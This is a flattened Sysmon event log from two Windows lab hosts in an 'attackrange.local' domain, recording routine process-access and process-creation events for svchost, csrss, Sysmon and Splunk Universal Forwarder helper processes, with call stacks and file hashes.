16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246454Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246453Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246452Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246451Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246450Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246449Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246448Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246447Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246446Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5298-6063-CB22-00000000AF01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246445Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5298-6063-CB22-00000000AF01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246444Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:24.242{CB4067E1-5298-6063-CB22-00000000AF01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061601Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.877{7F8C56E7-5299-6063-3901-00000000AF01}22963404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061600Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A18DB6CB3CAA51D2E08CA2C0E3D844A,SHA256=67B93C91842B48CE4A4479FBB7A1C8EC6B2B1F0759FB5AA700D903B3C1670291,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061599Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5299-6063-3901-00000000AF01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061598Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061597Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061596Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061595Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061594Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5299-6063-3901-00000000AF01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061593Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.736{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5299-6063-3901-00000000AF01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061592Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.738{7F8C56E7-5299-6063-3901-00000000AF01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061591Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.174{7F8C56E7-5299-6063-3801-00000000AF01}53044360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061590Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5299-6063-3801-00000000AF01}5304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061589Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061588Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061587Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:25.049{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061586Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 